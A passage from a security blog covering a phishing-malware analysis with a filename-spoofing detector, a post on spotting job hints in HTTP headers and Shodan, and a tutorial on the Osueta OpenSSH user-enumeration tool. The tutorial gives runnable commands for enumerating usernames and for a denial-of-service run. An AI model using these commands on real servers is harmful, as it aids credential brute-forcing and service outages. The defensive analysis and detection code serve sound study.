After spending some time digging into the SMTP headers to gather further information about the sender, it is time to focus on the attachment.</div>
<div style="text-align: justify;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHvzWG8AmYIGlX2pR6aCgJ5Y2ioHFOpyKDRYJMTuo3AEAhugr9nb63kDdvrxNfMOqU8lfwUB9T8ee5J75Bn57wbQd1jJXNdxv4age3v0MCfD8jK_S9wGHJ8am6-RwlH3AWLm6qOab8xzg/s1600/AC-6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHvzWG8AmYIGlX2pR6aCgJ5Y2ioHFOpyKDRYJMTuo3AEAhugr9nb63kDdvrxNfMOqU8lfwUB9T8ee5J75Bn57wbQd1jJXNdxv4age3v0MCfD8jK_S9wGHJ8am6-RwlH3AWLm6qOab8xzg/s1600/AC-6.png" /></a></div>
</div>
<div style="text-align: justify;">
<br />
It seems an attempt has been made to disguise this file as a PDF, but we notice that the extension is actually ".7z". If we extract the file inside the ".7z" archive to our Desktop...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMGcvAf_K4k6vndR9siCpync5qoLvbGZRp8o4_lip13tL7Ngg4sS-TDzNT5bhKMbx5IF5r719Us-HU6BhcuZmocCV-5PmI-fgHpUpnKUvCihdlTByTmvcyjuAxEPEVG5-lRyxv4M18Phk/s1600/AC-7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMGcvAf_K4k6vndR9siCpync5qoLvbGZRp8o4_lip13tL7Ngg4sS-TDzNT5bhKMbx5IF5r719Us-HU6BhcuZmocCV-5PmI-fgHpUpnKUvCihdlTByTmvcyjuAxEPEVG5-lRyxv4M18Phk/s1600/AC-7.png" /></a></div>
<br />
...we see the icon of a PDF file with a weird extension: "pdf%%". We can't see the .exe extension because the "hide extensions for known file types" option is enabled in our Windows. FireEye said that this file uses <a href="https://blog.malwarebytes.org/online-security/2014/01/the-rtlo-method/" target="_blank">RTLO</a> to trick the user, but we can't see this technique in the attachment; at least, the extension doesn't change... With RTLO we would expect an extension "exe.pdf" instead of "pdf.exe" that runs as an application, but the attachment doesn't behave this way on our Windows 7. It doesn't matter: maybe in my next post I will talk about how easy it is to use RTLO and icon changing to trick a user into opening a file which appears to be a valid document but is actually malware. These kinds of techniques are really used in real attacks such as the <a href="http://www.behindthefirewalls.com/2014/03/siesta-campaign-nothing-is-what-it-seems.html" target="_blank">Siesta Campaign</a> or others like <a href="http://www.behindthefirewalls.com/2014/04/why-you-shouldnt-open-files-directly-from-winrar.html" target="_blank">WinRar file extension spoofing</a>.<br />
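<div style="text-align: justify;">
The two disguises discussed here, a document-looking name with the real extension hidden behind it ("pdf%%.exe") and a Unicode right-to-left override that makes "fdp.exe" render as "exe.pdf", can both be caught on the filename alone. Below is an added example of such an attachment check for a mail gateway or a triage script; it is not from the post or from any vendor. The filenames are constructed, and the extension lists are a starting point rather than a complete catalogue.</div>

```python
# Unicode bidirectional controls that can reorder how a filename is displayed.
BIDI_CONTROLS = {
    "\u202e": "RLO",  # right-to-left override, the character behind the RTLO trick
    "\u202d": "LRO",
    "\u202a": "LRE",
    "\u202b": "RLE",
    "\u2066": "LRI",
    "\u2067": "RLI",
    "\u2068": "FSI",
    "\u200e": "LRM",
    "\u200f": "RLM",
}
# Extensions Windows runs as code (starting point, not exhaustive).
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "wsf", "msi", "jar", "hta"}
# Extensions users read as harmless documents or images.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "rtf", "jpg", "png"}


def strip_controls(name):
    return "".join(ch for ch in name if ch not in BIDI_CONTROLS)


def rendered_name(name):
    """Approximate what a naive file browser shows: text after an RLO is reversed."""
    if "\u202e" not in name:
        return strip_controls(name)
    head, _, tail = name.partition("\u202e")
    return strip_controls(head) + strip_controls(tail)[::-1]


def true_extension(name):
    """The extension the OS acts on: text after the last dot, controls removed."""
    clean = strip_controls(name)
    return clean.rpartition(".")[2].lower() if "." in clean else ""


def looks_like_document(segment):
    """'pdf', 'pdf%%' and similar fragments read as a document type to the eye."""
    seg = segment.lower()
    return any(seg == ext or (seg.startswith(ext) and not seg[len(ext):].isalnum())
               for ext in DOCUMENT_EXTS)


def inspect_attachment(name):
    """Return what a gateway should log about one attachment filename."""
    findings = []
    controls = sorted({BIDI_CONTROLS[ch] for ch in name if ch in BIDI_CONTROLS})
    if controls:
        findings.append("bidi control characters: " + ", ".join(controls))

    real_ext = true_extension(name)
    shown = rendered_name(name)
    shown_ext = shown.rpartition(".")[2].lower() if "." in shown else ""
    if real_ext in EXECUTABLE_EXTS:
        findings.append(f"executable extension .{real_ext}")
        if shown_ext != real_ext and shown_ext in DOCUMENT_EXTS:
            findings.append(f"displayed as .{shown_ext} but runs as .{real_ext}")
        segments = strip_controls(name).split(".")
        if len(segments) >= 3 and looks_like_document(segments[-2]):
            findings.append(f"document-looking double extension '.{segments[-2]}.{real_ext}'")
    return {"name": name, "rendered": shown, "true_extension": real_ext, "findings": findings}


if __name__ == "__main__":
    # Constructed filenames: the hidden-extension case from this post, an RTLO
    # case, and a benign document for comparison.
    for sample in ("Order_0801.pdf%%.exe", "Order_0801\u202efdp.exe", "Order_0801.pdf"):
        report = inspect_attachment(sample)
        print(repr(report["rendered"]), "->", report["findings"] or ["clean"])
```

<div style="text-align: justify;">
The first constructed name is flagged for its executable extension and the document-looking segment in front of it, which is exactly what the user does not see when Windows hides known extensions; the second is flagged for the RLO character and for rendering as .pdf while running as .exe.</div>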
<br />
I would like to look at the executable before continuing with how the hackers are trying to trick the user. We notice that this executable is signed with a certificate which has been revoked.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEAUrxNaWkV7tBe6AUo-x-Gvwff1tTJrNMQvSlF4Gprj9gC0HhcO_y2tgzthkz7W2uoVE9ZAmJKZdynFR3CoC932G_EAafjyIALNA1rF_qRySkI3seV-J31D5dKDafkVSNCBxcHvi79yA/s1600/AC-8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEAUrxNaWkV7tBe6AUo-x-Gvwff1tTJrNMQvSlF4Gprj9gC0HhcO_y2tgzthkz7W2uoVE9ZAmJKZdynFR3CoC932G_EAafjyIALNA1rF_qRySkI3seV-J31D5dKDafkVSNCBxcHvi79yA/s1600/AC-8.png" height="201" width="400" /></a></div>
</div>
<div style="text-align: justify;">
This stolen certificate has been used to bypass the checks of many security products and devices. For some of them, the first check is whether the executable is signed; if it is, with a valid certificate, no further security actions are taken and the executable is allowed into the network. Of course, after the company realized this problem, they revoked the certificate...<br />
<br />
So, what happens if we execute the file which looks like a PDF file?<br />
<br />
While the <a href="https://www.virustotal.com/en/file/dbf409fee8158583f231c2318bc6a1c89fd943fcc30c8909f50af8c66b510941/analysis/" target="_blank">malware</a> is doing its evil actions, a web browser is opened with the supposed Armani order.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgB1m_Qc6Z6aH8GR55Z82pkBLJSSBZ3aBy6az16rHkoyBLF2wYLyiF4_eCemWIF9LJWISivwP6I0I8teE5zpVpX6iMNADrg8h37S8HJqoqHSoZQcxYcKVxLCDX9Fe11XemvgN4nyO1gS8/s1600/AC-9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgB1m_Qc6Z6aH8GR55Z82pkBLJSSBZ3aBy6az16rHkoyBLF2wYLyiF4_eCemWIF9LJWISivwP6I0I8teE5zpVpX6iMNADrg8h37S8HJqoqHSoZQcxYcKVxLCDX9Fe11XemvgN4nyO1gS8/s1600/AC-9.png" height="482" width="640" /></a></div>
<br />
For security people these techniques do not go unnoticed, but we can see how they fool the layman every day.<br />
<h2>
Conclusion</h2>
Thanks to FireEye and ContagioDump, who shared their analysis and samples, we have been able to see how the hacker probably got access to a hotel mail account to start a spam campaign and send a spear phishing attack. They spoofed a mail account of a well-known clothes brand, a company that doesn't have an SPF record to prevent being spoofed.<br />
<br />
Also, we have observed how the hacker tried to disguise the malicious executable as a PDF by changing its icon to a PDF picture and maybe using RTLO. After opening the file, a web browser is opened with the apparent order while the <a href="https://www.virustotal.com/en/file/dbf409fee8158583f231c2318bc6a1c89fd943fcc30c8909f50af8c66b510941/analysis/" target="_blank">malware</a> is doing its evil actions.<br />
<br />
Moreover, I've been researching this case a little more and I've found a post on Facebook <a href="https://www.facebook.com/Marnaque/posts/491122357681969" target="_blank">https://www.facebook.com/Marnaque/posts/491122357681969</a> which talks about a similar phishing mail. Notice that now they are trying to spoof another clothes brand and are using a similar mail body with the same order number: 0801E376E15829. We can suspect the same guys are behind it...<br />
<br />
<br /></div>
Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-15592072841466307852014-07-15T12:32:00.001-07:002014-07-15T12:39:03.526-07:00Looking for a job in the security field in a different way<div style="text-align: justify;">
You already know what the most common way of getting a job is. You usually look for vacancies on a job web portal and, when you think you could be selected, you apply... Then, most companies look at your resume and start reading about your previous experience and your studies... </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
But if you are looking to get a new job in the security field, take a moment to look around before sending your resume... Maybe the company is giving you an advantage over the other candidates and you have no idea about it.</div>
<h2 style="text-align: justify;">
Have you looked at the web code source?</h2>
<div style="text-align: justify;">
Yes, you read that right. Maybe you are using a well-known security scanner and would like to work for its vendor. You should research the company a little more. For example, visit their website and look at its source code... Sometimes you get surprises, as you can see in the picture below...</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidEm5CDXV7mthFrzXOe3NtwlTy4GorhyphenhyphenJKQJ825RmAFqmSYkmiklJV_M3-zpcOAG2O8PTT9SVyTpgWOyNtQC6GxuYVOKi3f_cJMGqqAN-GETs4sgMjILmcexnqEcrM7oz7ZDg-U5nrd6Y/s1600/Tenable_II.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidEm5CDXV7mthFrzXOe3NtwlTy4GorhyphenhyphenJKQJ825RmAFqmSYkmiklJV_M3-zpcOAG2O8PTT9SVyTpgWOyNtQC6GxuYVOKi3f_cJMGqqAN-GETs4sgMjILmcexnqEcrM7oz7ZDg-U5nrd6Y/s1600/Tenable_II.png" height="220" width="400" /></a></div>
<h2>
Looking at your network traffic</h2>
<div style="text-align: justify;">
Here is another real example... While I was studying in order to improve my technical skills, I found a hint in a PCAP network capture I was reading with Wireshark... I never would have imagined that I could find a new job by reading a network traffic capture...</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnmnYE4vaFHuJSR6URkukLBWy5jgjjNV6aFPrVSZMTMKpHRbLJ5NOEBJxY90-kGI0rUFCSKft9aWC9yTPR_nRUWYWjfrXzbYTdhHF5lsnHxobxVQ9leYOiRrVigrRwNIvYRrdq1RhtIpg/s1600/Wireshark-II.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnmnYE4vaFHuJSR6URkukLBWy5jgjjNV6aFPrVSZMTMKpHRbLJ5NOEBJxY90-kGI0rUFCSKft9aWC9yTPR_nRUWYWjfrXzbYTdhHF5lsnHxobxVQ9leYOiRrVigrRwNIvYRrdq1RhtIpg/s1600/Wireshark-II.png" height="178" width="640" /></a></div>
<br />
<h2>
Looking into the HTTP headers</h2>
<div style="text-align: justify;">
What we really discovered before was that the company added a custom HTTP header in order to show you a "secret" message. So, instead of getting a traffic capture to read the "secret" message, we can use wget to print the response headers and look for a new opportunity:<br />
<br />
wget -S example.com -O /dev/null</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDo51yrikp5n3CBDhP-mtQL1yZfYHWM8i_20J6jpOXzGkyhnY00DKx2MEZ0gN_BOrehS1LaLcwYDZpdCxrxxSaIAy9wl-_qEfglxL6IgmdlYAmlU4ijI3b-R3Gn_ufGIAGhJzqaKd7yic/s1600/Http_Header.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDo51yrikp5n3CBDhP-mtQL1yZfYHWM8i_20J6jpOXzGkyhnY00DKx2MEZ0gN_BOrehS1LaLcwYDZpdCxrxxSaIAy9wl-_qEfglxL6IgmdlYAmlU4ijI3b-R3Gn_ufGIAGhJzqaKd7yic/s1600/Http_Header.png" /></a></div>
<br />
<h2>
Looking for a job in Shodan</h2>
<div style="text-align: justify;">
<div style="text-align: justify;">
You already know that Shodan grabs and indexes the HTTP headers of the hosts it scans... So we can get a lot of results like the previous one by using Shodan.</div>
<br />
Here are more examples...</div>
<br />
<a href="http://www.shodanhq.com/search?q=x-hacker+work" target="_blank">http://www.shodanhq.com/search?q=x-hacker+work</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3oW-Htn2XVvVcT39XVnU9leq9zGCU_2FHFcEJGC5f8pAnBucZRbiiE6ggnUxWXpQJGFtoYyruze3cM4rfTWxflHx7UeXxm_RyV4csJcH3boBhPbSnGXZCx5bEht0eESBamWvsYWEYfew/s1600/Shodan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3oW-Htn2XVvVcT39XVnU9leq9zGCU_2FHFcEJGC5f8pAnBucZRbiiE6ggnUxWXpQJGFtoYyruze3cM4rfTWxflHx7UeXxm_RyV4csJcH3boBhPbSnGXZCx5bEht0eESBamWvsYWEYfew/s1600/Shodan.png" height="322" width="640" /></a></div>
<br />
<a href="http://www.shodanhq.com/search?q=x-hacker+job" target="_blank">http://www.shodanhq.com/search?q=x-hacker+job</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj95WUTigZFuWAmJzXujGf-wBxzzcKwzp10F35clwy7rMutj0gbixn1UwrzroNohouPKe_k4kbAUj6Ns7ZKb62IICTwLKQnQz5u6KHOLNAn8VDXklDsXRMwUQHvJ0amW6a3fb5nub89uSQ/s1600/Shodan-II.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj95WUTigZFuWAmJzXujGf-wBxzzcKwzp10F35clwy7rMutj0gbixn1UwrzroNohouPKe_k4kbAUj6Ns7ZKb62IICTwLKQnQz5u6KHOLNAn8VDXklDsXRMwUQHvJ0amW6a3fb5nub89uSQ/s1600/Shodan-II.png" height="370" width="640" /></a></div>
<br />
<a href="http://www.shodanhq.com/search?q=hiring" target="_blank">http://www.shodanhq.com/search?q=hiring</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqyK-x8qxxdWfxez7q_I5Kn7rGZF6VjK4Iz3VIcMpJS3pldsFLp8YrbS4I6SFvp1tDhAoF5aWX2pBmV-ltXOCpmvQXHOdlZC5trQJ7UzDN1TEmwfx2AKsu8Q25aLON5QunYRob4PkXxhc/s1600/Shodan-III.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqyK-x8qxxdWfxez7q_I5Kn7rGZF6VjK4Iz3VIcMpJS3pldsFLp8YrbS4I6SFvp1tDhAoF5aWX2pBmV-ltXOCpmvQXHOdlZC5trQJ7UzDN1TEmwfx2AKsu8Q25aLON5QunYRob4PkXxhc/s1600/Shodan-III.png" height="350" width="640" /></a></div>
<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-69503331560131131942014-07-01T07:23:00.000-07:002014-07-01T07:24:07.655-07:00OpenSSH User Enumeration Time-Based Attack with Osueta<h2>
Introduction</h2>
<div style="text-align: justify;">
In this post I'd like to introduce you to an awesome tool focused on taking advantage of an OpenSSH vulnerability. I'd like to thank <a href="https://twitter.com/cor3dump3d" target="_blank">@cor3dump3d</a> for letting me participate in his project. Before starting, just a brief introduction...<br />
<br />
OpenSSH is a well-known tool to remotely manage *nix systems. It has replaced telnet, rlogin and ftp, tools which transmit their data (even passwords) across the network unencrypted. OpenSSH encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking and other attacks... But it does not eliminate every kind of attack, for example the OpenSSH User Enumeration Time-Based Attack. Osueta has been developed to take advantage of that OpenSSH bug and offers us a way to improve our Brute Force attacks against an OpenSSH server.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In a Brute Force attack, we try different username and password combinations until the attack is successful, that is, until we get access to the system with the guessed credentials. So, we need to know two fields to be authenticated on an OpenSSH server: username and password.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Thanks to Osueta, we are able to guess the usernames available on the OpenSSH server. Once the usernames have been guessed, we have 50% of the credentials, and the time needed to perform the Brute Force attack (trying username and password combinations) is reduced because we already know the username.</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
How does this bug work?</h2>
<div style="text-align: justify;">
With the scenarios below, I will show you how this attack works. When we want to connect to an OpenSSH server, we need to type a username and a password.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b><u>Scenario 1</u></b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If the username doesn't exist, the password is not compared with a stored one.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><b><u>Scenario 2</u></b></span></span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">If the username exists, the password is compared with the original one. If the hash compared is the same, you are granted access to the system. If not, you are rejected.</span></span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><b><u>Scenario 3</u></b></span></span></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"></span></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><b><u><br /></u></b></span></span></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">If the username exists and the password typed is for example </span></span>40.000 A's (40000 bytes), the fact of generating the hash of this long password in order to compare it with the original one, makes the system slow down and the time measurement is increased. So if the delay is increased when we use this long password, the username exists.<br />
<br />
The picture below shows the performance of my computer when I tried an invalid username:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPcLRApkDFuL60CJiPOG2F7kppf1W4xchTGdSn6ZoQJkYo4qrPz9c6pgRcMjxB9rbD3DlI1J2Mh19sAgwrdTN0xQdQ-6PlL8ExAVd4RKdOoF1iPE1vPi_tZddWm07ACAHwBmgQ_LtVQ1A/s1600/OpenSSH_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPcLRApkDFuL60CJiPOG2F7kppf1W4xchTGdSn6ZoQJkYo4qrPz9c6pgRcMjxB9rbD3DlI1J2Mh19sAgwrdTN0xQdQ-6PlL8ExAVd4RKdOoF1iPE1vPi_tZddWm07ACAHwBmgQ_LtVQ1A/s1600/OpenSSH_1.png" height="134" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
And this is the performance while it was being tested with a valid username and a 40000-byte password:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzseJIIOrO4JoE68ItpYJhn8JKk_tteWUE0qNju8rlS1Tz7WXWybyiYnDD4I_jM-Htu_b8N7ViAMVNS9MdF7WdxezGzZtVFIy6d95beSmkd6R-HzoWOy2XLhvtVNZO3_qBYEI4d0i4Kgk/s1600/OpenSSH2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzseJIIOrO4JoE68ItpYJhn8JKk_tteWUE0qNju8rlS1Tz7WXWybyiYnDD4I_jM-Htu_b8N7ViAMVNS9MdF7WdxezGzZtVFIy6d95beSmkd6R-HzoWOy2XLhvtVNZO3_qBYEI4d0i4Kgk/s1600/OpenSSH2.png" height="144" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Find more info about this bug in <a href="https://cureblog.de/2013/07/openssh-user-enumeration-time-based-attack/" target="_blank">OpenSSH User Enumeration Time-Based Attack</a>.<br />
<br />
Notice that OpenSSH 5.* and 6.* servers are affected...</div>
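The three scenarios above can be modelled without touching a network. The following is an added example written for this post, not code from OpenSSH or Osueta: it replays the decision each scenario describes against a constructed in-memory user table and counts how many bytes each version feeds into the password hash, which is the work that produces the delay the screenshots show. The user table, the salts and the password-length cap (`MAX_PASSWORD_BYTES`) are this example's assumptions, not OpenSSH settings. `auth_hardened` shows the two changes a defender wants: refuse oversized passwords before hashing, and hash something for unknown users too so that scenario 1 costs the same as scenario 2.

```python
"""Model of the timing leak behind scenarios 1 to 3, with a hardened variant.

Added example for this post; not code from OpenSSH or Osueta. No network
access: authentication decisions are replayed against a constructed user
table and each function reports how many password bytes were hashed, which
is the work that produces the delay the screenshots show.
"""
import hashlib
import hmac

# Constructed user table: username -> (salt, stored hash). Not real accounts.
_SALT = b"constructed-salt"
USERS = {
    "jnieto": (_SALT, hashlib.pbkdf2_hmac("sha256", b"correct horse", _SALT, 1000)),
}

# Dummy salt so that unknown users still pay for one hash computation.
_DUMMY_SALT = b"dummy-salt-for-unknown-users"

# Assumed cap on the password length that will be hashed (this example's
# choice, not an OpenSSH setting); a 40000-byte probe never reaches the hash.
MAX_PASSWORD_BYTES = 1024


def slow_hash(password, salt):
    """Stand-in for crypt(3): an iterated hash whose cost grows with input size."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, 1000)


def auth_leaky(username, password):
    """Scenarios 1-3 as described: hash only when the username exists.

    Returns (granted, bytes_hashed). An unknown user costs no hashing at all
    (scenario 1); a known user costs len(password) bytes of hashing (scenarios
    2 and 3), so a 40000-byte password makes the difference measurable.
    """
    if username not in USERS:
        return False, 0                       # scenario 1: early exit
    salt, stored = USERS[username]
    granted = hmac.compare_digest(slow_hash(password, salt), stored)
    return granted, len(password)             # scenarios 2 and 3


def auth_hardened(username, password):
    """Same decision, but the work done does not depend on whether the user exists.

    1. Oversized passwords are refused before hashing, for every username.
    2. Unknown users are hashed against a dummy salt, so scenario 1 costs the
       same as scenario 2 and the username is no longer visible in the delay.
    """
    if len(password) > MAX_PASSWORD_BYTES:
        return False, 0
    salt, stored = USERS.get(username, (_DUMMY_SALT, None))
    digest = slow_hash(password, salt)
    granted = stored is not None and hmac.compare_digest(digest, stored)
    return granted, len(password)


if __name__ == "__main__":
    probe = b"A" * 40000
    for name in ("nobody", "jnieto"):
        print(name, "leaky:", auth_leaky(name, probe),
              "hardened:", auth_hardened(name, probe))
```

Wall-clock measurements would be too noisy to assert on, so the functions report hashing work instead; the difference the post shows between the two screenshots corresponds to the second element of the tuple returned by `auth_leaky`, and `auth_hardened` makes that element identical for known and unknown users.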
<h2 style="text-align: justify;">
Working with Osueta</h2>
<div style="text-align: justify;">
Ok. We have learned a little bit more about this bug and now it is time to take advantage of it.<br />
<br />
Before starting, we need to install the packages below:<br />
<br /></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
# apt-get install python-ipy python-nmap python-paramiko </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Then, we can download <a href="https://github.com/c0r3dump3d/osueta" target="_blank">Osueta</a> from GitHub:</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
$ git clone https://github.com/c0r3dump3d/osueta.git<br />
<br />
Notice that the first thing Osueta does when it runs is to test 10 random usernames in order to measure the server's normal delay, that is, how long we can expect to wait for a reply under normal conditions. From those measurements Osueta sets a delay threshold, and if the reply for a tested username exceeds it, that user exists.<br />
<br />
<u>Example 1.</u> Checking whether a single username exists.</div>
<div style="text-align: justify;">
<br />
./osueta.py -H 127.0.0.1 -U jnieto -p 22 <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrtxU6dJXdlAqicdPwlJ08lzO1rYFaqIIARmQWE9oyx1ZVJFmzwXIKs8SN1fgtqQn7-WxuHkh4ayQBOaT8n5ioQ-Iu6Go1qi1nGN1h9dn2Krk_d_liFDtuFAlkDGNGPwYvp4a4UqyMbt8/s1600/Osueta_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrtxU6dJXdlAqicdPwlJ08lzO1rYFaqIIARmQWE9oyx1ZVJFmzwXIKs8SN1fgtqQn7-WxuHkh4ayQBOaT8n5ioQ-Iu6Go1qi1nGN1h9dn2Krk_d_liFDtuFAlkDGNGPwYvp4a4UqyMbt8/s1600/Osueta_1.png" height="299" width="320" /></a></div>
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Example 2.</u> Guessing usernames from a list. <br />
<br />
./osueta.py -H 127.0.0.1 -L users.txt -p 22 </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4IcoiP4XX6Drh8NiQkmZlKGmh8FRBScVLbaMl6yHM8IWDXtS_YVEg2IPPGj7dgPqHU-gdxUK_lBCBtoDAef_dzgoG0ANbAeI3Ex2IOtgoe24hnv_iDIDHN0i9YpitbPobUgUQ2bJevww/s1600/Osueta_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4IcoiP4XX6Drh8NiQkmZlKGmh8FRBScVLbaMl6yHM8IWDXtS_YVEg2IPPGj7dgPqHU-gdxUK_lBCBtoDAef_dzgoG0ANbAeI3Ex2IOtgoe24hnv_iDIDHN0i9YpitbPobUgUQ2bJevww/s1600/Osueta_2.png" height="320" width="276" /></a></div>
<br /></div>
<div style="text-align: justify;">
<br />
<u>Example 3.</u> Trying a DoS of the OpenSSH service. Notice that you need to know or to guess a username to perform a DoS attack.<br />
<br />
./osueta.py -H 127.0.0.1 -p 22 -U jnieto -v no --dos yes<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMiDUhs4aLNGuBWcvHX0lOe2Ex6LwZijtTP-DYry1xWfK2bcwYHmzzkm7B_RDEHMdOsEVG67tjr3ay6gdBdlMKpLCQaoYvsvf9P9Tj7UJBUjmPQyIu3XvzNgM-BbQD0Jp4U-BQssw9CVk/s1600/Osueta_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMiDUhs4aLNGuBWcvHX0lOe2Ex6LwZijtTP-DYry1xWfK2bcwYHmzzkm7B_RDEHMdOsEVG67tjr3ay6gdBdlMKpLCQaoYvsvf9P9Tj7UJBUjmPQyIu3XvzNgM-BbQD0Jp4U-BQssw9CVk/s1600/Osueta_4.png" height="250" width="640" /></a></div>
<br />
You can see the result of this attack in the picture below... The CPU is at 100% and there are a lot of connections to the OpenSSH server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXWuvC4vYRSdRLAXoyy1QFyFO9bA7GGcF8SwOf9ASCGByXBTWh_00esmMh6hBR1hEKbkvUCYOlWb1QrlZESLc4Q4DIGGlrhowXqSHmeUTPBvVMe7UqU6MbN-TwbSfvRUcGFouAfej5vWQ/s1600/Osueta_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXWuvC4vYRSdRLAXoyy1QFyFO9bA7GGcF8SwOf9ASCGByXBTWh_00esmMh6hBR1hEKbkvUCYOlWb1QrlZESLc4Q4DIGGlrhowXqSHmeUTPBvVMe7UqU6MbN-TwbSfvRUcGFouAfej5vWQ/s1600/Osueta_3.png" height="309" width="640" /></a></div>
<br />
When the maximum number of sessions is reached, the machine starts rejecting further connections, causing a DoS.<br />
<br />
